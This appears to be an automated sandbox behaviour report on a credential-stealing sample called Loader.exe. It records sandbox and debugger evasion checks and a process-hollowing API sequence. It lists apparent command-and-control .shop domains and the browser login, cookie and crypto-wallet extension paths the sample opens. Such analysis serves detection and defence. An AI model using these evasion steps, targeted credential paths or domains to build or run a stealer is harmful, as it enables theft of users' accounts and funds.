                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00329D6A push ecx; ret 0_2_00329D7D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00329D6A push ecx; ret 3_2_00329D7D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00449A37 push edx; iretd 3_2_00449A39
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00447BC3 push esp; retf 3_2_00447BD9
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043D490 push eax; mov dword ptr [esp], 010E0F0Ch3_2_0043D49F
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00440630 push eax; mov dword ptr [esp], 6C6F6EA1h3_2_00440632
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00449701 pushfd ; iretd 3_2_00449702
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004467BC push 00000051h; ret 3_2_0044686F
                Source: C:\Users\user\Desktop\Loader.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\Loader.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeWindow / User API: threadDelayed 5180Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exe TID: 1644Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Loader.exe TID: 5548Thread sleep count: 5180 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Loader.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Loader.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0033B6A8 FindFirstFileExW,0_2_0033B6A8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0033B759 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0033B759
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0033B6A8 FindFirstFileExW,3_2_0033B6A8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0033B759 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_0033B759
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: Loader.exe, 00000003.00000002.3277147132.0000000002CAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPR
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Loader.exe, 00000003.00000003.2638595862.0000000002CDE000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2375179400.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2352050415.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.3047305155.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2390068678.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2338745992.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2415892522.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2375611870.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.3047406602.0000000002CE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.3277232478.0000000002CE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2336916157.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: Loader.exe, 00000003.00000003.2352220187.00000000054D8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\Loader.exeAPI call chain: ExitProcess graph end nodegraph_3-31924
                Source: C:\Users\user\Desktop\Loader.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043EEC0 LdrInitializeThunk,3_2_0043EEC0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00329A33 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00329A33
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0035019E mov edi, dword ptr fs:[00000030h]0_2_0035019E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00321BA0 mov edi, dword ptr fs:[00000030h]0_2_00321BA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00321BA0 mov edi, dword ptr fs:[00000030h]3_2_00321BA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00336FE0 GetProcessHeap,0_2_00336FE0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00329A33 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00329A33
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00331A20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00331A20
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00329A27 SetUnhandledExceptionFilter,0_2_00329A27
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00329673 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00329673
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00329A33 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00329A33
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00331A20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00331A20
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00329A27 SetUnhandledExceptionFilter,3_2_00329A27
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00329673 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00329673

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0035019E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_0035019E
                Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Users\user\Desktop\Loader.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: Loader.exe, 00000000.00000002.2038611351.0000000002C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
                Source: Loader.exe, 00000000.00000002.2038611351.0000000002C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
                Source: Loader.exe, 00000000.00000002.2038611351.0000000002C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
                Source: Loader.exe, 00000000.00000002.2038611351.0000000002C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
                Source: Loader.exe, 00000000.00000002.2038611351.0000000002C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
                Source: Loader.exe, 00000000.00000002.2038611351.0000000002C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
                Source: Loader.exe, 00000000.00000002.2038611351.0000000002C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
                Source: Loader.exe, 00000000.00000002.2038611351.0000000002C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
                Source: Loader.exe, 00000000.00000002.2038611351.0000000002C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: fancywaxxers.shop
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_003368BD
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_0033B085
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_0033B0D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0033B177
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0033A9F7
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_0033B27D
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_003363B5
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_0033AC48
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0033ACF0
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_0033AF43
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_0033AFB0
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,3_2_003368BD
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,3_2_0033B085
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,3_2_0033B0D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0033B177
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_0033A9F7
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,3_2_0033B27D
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,3_2_003363B5
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,3_2_0033AC48
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_0033ACF0
                Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,3_2_0033AF43
                Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,3_2_0033AFB0
                Source: C:\Users\user\Desktop\Loader.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0032A2F5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0032A2F5
                Source: C:\Users\user\Desktop\Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Loader.exe, 00000003.00000003.2415851140.0000000002D55000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2415892522.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2416587052.0000000002D55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 6472, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Loader.exe, 00000003.00000003.2638595862.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: Loader.exe, 00000003.00000003.2638595862.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: Loader.exe, 00000003.00000003.2638595862.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Loader.exe, 00000003.00000003.2375179400.0000000002D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx LibertyimeUy[
                Source: Loader.exe, 00000003.00000003.2338745992.0000000002D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Loader.exe, 00000003.00000003.2638595862.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                Source: Loader.exe, 00000003.00000003.2638595862.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: Loader.exe, 00000003.00000003.2338745992.0000000002D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: erations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"]
                Source: Loader.exe, 00000003.00000003.2352050415.0000000002CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
